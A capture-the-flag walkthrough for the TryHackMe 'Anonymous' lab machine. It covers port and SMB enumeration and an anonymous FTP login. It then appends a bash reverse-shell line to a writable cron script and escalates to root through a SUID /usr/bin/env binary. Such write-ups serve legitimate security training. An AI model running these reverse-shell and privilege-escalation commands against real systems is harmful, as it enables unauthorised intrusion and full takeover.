Add IP address to your hosts file:

echo '10.10.98.41    anonymous.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv anonymous.thm

PORT    STATE SERVICE      REASON
21/tcp  open  ftp          syn-ack ttl 64
22/tcp  open  ssh          syn-ack ttl 64
139/tcp open  netbios-ssn  syn-ack ttl 64
445/tcp open  microsoft-ds syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 21,22,139,445 anonymous.thm

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.251.141
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (EdDSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

It’s time to answer few questions:

Enumerate the machine. How many ports are open?

What service is running on port 21?

What service is running on ports 139 and 445?

Enumerate SMB shares:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse anonymous.thm

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.98.41\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (anonymous server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.98.41\pics: 
|     Type: STYPE_DISKTREE
|     Comment: My SMB Share Directory for Pics
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\namelessone\pics
|     Anonymous access: READ
|     Current user access: READ
|   \\10.10.98.41\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
| smb-enum-users: 
|   ANONYMOUS\namelessone (RID: 1003)
|     Full name:   namelessone
|     Description: 
|_    Flags:       Normal user account

Now you can answer another question:

There’s a share on the user’s computer. What’s it called?

Ok, so we have FTP, SSH and SMB ports open. FTP has anonymous login allowed so let’s check it out.

Connect to FTP:

root@ip-10-10-251-141:~# ftp anonymous.thm
Connected to anonymous.thm.
220 NamelessOne's FTP Server!
Name (anonymous.thm:root): anonymous 
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Look around:

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         1333 Mar 09 07:14 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.

Download all the files:

ftp> prompt off
Interactive mode off.
ftp> mget *

File to_do.txt:

File clean.sh:

File removed_files.log:

Ok, there is a cleanup script that has a log file and probably runs on a cron. Luckily for us, we can modify clean.sh, so if cron really is what executes it, we can get a reverse shell.

Modify clean.sh:

echo 'bash -i >& /dev/tcp/10.10.251.141/4242 0>&1' >> clean.sh

Setup a listener:

nc -lnvp 4242

Now go back to the terminal where you are connected to FTP and upload modified version of clean.sh:

ftp> put clean.sh
local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
358 bytes sent in 0.00 secs (17.0708 MB/s)

Wait for a connection…

And we have a reverse connection:

Stabilize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo; fg ENTER ENTER
stty rows 24 columns 80
export TERM=xterm-256color

Now look around – find the user flag and read it:

namelessone@anonymous:~$ pwd
/home/namelessone
namelessone@anonymous:~$ ls -lA
total 52
lrwxrwxrwx 1 root        root           9 May 11  2020 .bash_history -> /dev/null
-rw-r--r-- 1 namelessone namelessone  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 namelessone namelessone 3771 Apr  4  2018 .bashrc
drwx------ 2 namelessone namelessone 4096 May 11  2020 .cache
drwx------ 3 namelessone namelessone 4096 May 11  2020 .gnupg
-rw------- 1 namelessone namelessone   36 May 12  2020 .lesshst
drwxrwxr-x 3 namelessone namelessone 4096 May 12  2020 .local
drwxr-xr-x 2 namelessone namelessone 4096 May 17  2020 pics
-rw-r--r-- 1 namelessone namelessone  807 Apr  4  2018 .profile
-rw-rw-r-- 1 namelessone namelessone   66 May 12  2020 .selected_editor
-rw-r--r-- 1 namelessone namelessone    0 May 12  2020 .sudo_as_admin_successful
-rw-r--r-- 1 namelessone namelessone   33 May 11  2020 user.txt
-rw------- 1 namelessone namelessone 7994 May 12  2020 .viminfo
-rw-rw-r-- 1 namelessone namelessone  215 May 13  2020 .wget-hsts
namelessone@anonymous:~$ cat user.txt 
[REDACTED]

Now we need to escalate our privileges to root – do a basic enumeration:

sudo -l
cat /etc/crontab
getcap -r 2>/dev/null
find / -type f -perm -4000 2>/dev/null

SUID bit set on /usr/bin/env is interesting – check GTFObins for the way to exploit it:

namelessone@anonymous:~$ /usr/bin/env /bin/sh -p
# id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

As we can see, our effective permissions (euid) are root.

Read the root flag:

# cat /root/root.txt
[REDACTED]

Do you like this writeup? Check out other THM Writeups.